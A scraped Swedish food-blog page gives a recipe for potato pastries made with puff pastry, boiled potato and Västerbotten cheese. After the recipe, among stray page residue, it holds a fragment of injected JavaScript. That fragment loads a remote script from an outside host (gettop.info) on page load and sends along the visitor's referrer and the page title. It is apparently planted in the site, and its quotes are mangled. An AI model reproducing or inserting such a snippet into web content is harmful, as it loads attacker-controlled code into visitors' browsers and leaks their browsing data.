Potatisbakelser.

bild1

De här potatisbakelserna är otroligt goda och passar perfekt till en köttbit eller fisk.


Potatisbakelser (ca 12 st)
1 ark färdig smördeg på rulle
Kokt svalnad potatis
Riven västerbottenost (en liten påse)
Flingsalt
Peppar
Uppvispat ägg

Bred ut arket med smördeg. Koka potatisen och låt svalna något. Pressa potatisen och strö över smördegen. Strö över osten, salta och peppra. Rulla ihop smördegen som en rulltårta och skär ca 12 breda skivor. Lägg på en bakplåt eller i muffinsformar (då håller de formen bättre). Pensla med uppvispat ägg och strö på lite mer ost ovanpå.

In i ugnen på ca 200 grader ca 15-20 minuter. Servera genast.

}

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

blogstats trackingpixel

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *

Följande HTML-taggar och attribut är tillåtna: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>